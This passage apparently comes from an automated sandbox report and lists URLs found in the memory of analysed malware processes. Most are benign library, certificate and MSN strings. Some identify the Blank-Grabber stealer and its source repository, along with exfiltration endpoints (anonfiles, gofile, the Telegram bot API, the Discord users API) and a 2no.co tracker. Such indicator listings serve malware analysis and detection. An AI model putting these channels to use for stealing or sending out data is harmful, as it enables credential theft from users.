                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                        Source: DE5A.exe, 00000016.00000002.2468316461.000001F013124000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2588239210.000001E8E7E24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674775597.00000000027E7000.00000004.00000020.00020000.00000000.sdmp, End.pif, 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp, End.pif, 0000000D.00000000.1875720079.0000000000A65000.00000002.00000001.01000000.00000005.sdmp, End.pif, 0000000E.00000002.1883575623.0000000000A65000.00000002.00000001.01000000.00000005.sdmp, End.pif, 0000000F.00000002.2017789238.0000000000A65000.00000002.00000001.01000000.00000005.sdmp, wsruwii, 00000014.00000002.2903181295.0000000000215000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458495109.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2468424463.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458790993.000001FEA7813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: DE5A.exe, 00000016.00000002.2466580305.000001F0127FD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495793287.000001E8E7918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                        Source: End.pif, 0000000A.00000003.1942049152.0000000001D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/
                        Source: End.pif, 0000000A.00000003.1941664700.0000000001CF8000.00000004.00000020.00020000.00000000.sdmp, End.pif, 0000000A.00000002.1945579841.0000000001CFF000.00000004.00000020.00020000.00000000.sdmp, End.pif, 0000000A.00000002.1945641936.0000000001D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/1gFnW4
                        Source: End.pif, 0000000A.00000002.1945641936.0000000001D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/1gFnW4Zw
                        Source: explorer.exe, 00000012.00000000.2010572086.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                        Source: explorer.exe, 00000012.00000000.2010572086.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
                        Source: DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                        Source: DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
                        Source: explorer.exe, 00000012.00000000.2006529919.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                        Source: explorer.exe, 00000012.00000000.2006529919.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                        Source: explorer.exe, 00000012.00000000.2003816190.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2002954132.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                        Source: explorer.exe, 00000012.00000000.2006529919.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2006529919.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                        Source: explorer.exe, 00000012.00000000.2006529919.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                        Source: DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                        Source: DE5A.exe, 00000016.00000002.2466911052.000001F012810000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                        Source: DE5A.exe, 00000016.00000003.2418416385.000001F01269B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2414862341.000001F01269B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466580305.000001F012661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                        Source: explorer.exe, 00000012.00000000.2010572086.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                        Source: DE5A.exe, 00000016.00000002.2468316461.000001F0130B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                        Source: DE5A.exe, 0000002E.00000002.2582736276.000001E8E78B4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495793287.000001E8E78B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapozJ
                        Source: DE5A.exe, 0000002E.00000003.2495793287.000001E8E7960000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E7960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.co
                        Source: DE5A.exe, 00000016.00000003.2419224582.000001F012E11000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2419538752.000001F01274B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2419784955.000001F012751000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2488129226.000001E8E74AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
                        Source: DE5A.exe, 00000016.00000003.2412664029.000001F0122FD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466223429.000001F0122D0000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2465660867.000001F010939000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2414172470.000001F0122FD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2579154545.000001E8E552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                        Source: DE5A.exe, 00000016.00000002.2466911052.000001F012810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/f4kedre4lity/Blank-Grabber
                        Source: DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/f4kedre4lity/Blank-Grabberi
                        Source: DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/f4kedre4lity/Blank-Grabberr
                        Source: DE5A.exe, 00000016.00000002.2466005224.000001F01223C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                        Source: DE5A.exe, 0000002E.00000002.2579154545.000001E8E552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                        Source: DE5A.exe, 00000016.00000003.2412664029.000001F0122FD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466223429.000001F0122D0000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2465660867.000001F010939000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2414172470.000001F0122FD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2579154545.000001E8E552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                        Source: DE5A.exe, 00000016.00000002.2467155729.000001F012ACB000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2423688017.000001F012B06000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2422950901.000001F012B1F000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2422846997.000001F012BDE000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495284322.000001E8E74C1000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2491101749.000001E8E78CA000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2491719061.000001E8E78CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                        Source: DE5A.exe, 00000016.00000003.2412664029.000001F0122FD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466223429.000001F0122D0000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2465660867.000001F010939000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2414172470.000001F0122FD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2579154545.000001E8E552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                        Source: DE5A.exe, 00000016.00000002.2468316461.000001F0130B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                        Source: DE5A.exe, 00000016.00000002.2467155729.000001F012B53000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467155729.000001F012C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                        Source: DE5A.exe, 0000002E.00000002.2586962906.000001E8E7CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                        Source: DE5A.exe, 00000016.00000002.2466223429.000001F01232A000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467155729.000001F012C8B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495670769.000001E8E7A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                        Source: DE5A.exe, 00000016.00000002.2466580305.000001F0127A5000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466223429.000001F01232A000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495670769.000001E8E7A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                        Source: DE5A.exe, 00000016.00000002.2466223429.000001F01232A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                        Source: DE5A.exe, 00000016.00000002.2467155729.000001F012C8B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E78B4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495793287.000001E8E78B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                        Source: DE5A.exe, 00000016.00000002.2467155729.000001F012C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                        Source: DE5A.exe, 00000016.00000002.2466580305.000001F0127A5000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467155729.000001F012ACB000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466580305.000001F012661000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2491345311.000001E8E7057000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2492104462.000001E8E743C000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E76F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                        Source: explorer.exe, 00000012.00000000.2010572086.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                        Source: DE5A.exe, 00000016.00000003.2418416385.000001F01269B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2414862341.000001F01269B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466911052.000001F012810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                        Source: DE5A.exe, 00000016.00000002.2470814485.00007FFDFB7F2000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                        Source: explorer.exe, 00000012.00000000.2010572086.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                        Source: DE5A.exe, 00000016.00000002.2466473798.000001F012510000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2580469572.000001E8E71F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/f4kedre4lity/Blank-Grabber/main/.github/workflows/image.png
                        Source: DE5A.exe, 0000002E.00000002.2580469572.000001E8E71F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/f4kedre4lity/Blank-Grabber/main/.github/workflows/image.pngpo
                        Source: DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/f4kedre4lity/Blank-Grabber/main/.github/workflows/image.pngz
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                        Source: DE5A.exe, 00000016.00000002.2466223429.000001F01232A000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466580305.000001F012661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                        Source: DE5A.exe, 00000016.00000003.2423688017.000001F012B7D000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467155729.000001F012B9A000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2424209134.000001F012BBD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467155729.000001F012B53000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2491719061.000001E8E78A6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E76F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
                        Source: DE5A.exe, 00000016.00000002.2466223429.000001F01232A000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467155729.000001F012C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                        Source: DE5A.exe, 00000016.00000002.2468316461.000001F013120000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495793287.000001E8E7960000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2496537431.000001E8E7981000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                        Source: DE5A.exe, 0000002E.00000002.2586962906.000001E8E7CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                        Source: explorer.exe, 00000012.00000000.2010572086.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                        Source: explorer.exe, 00000012.00000000.2010572086.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
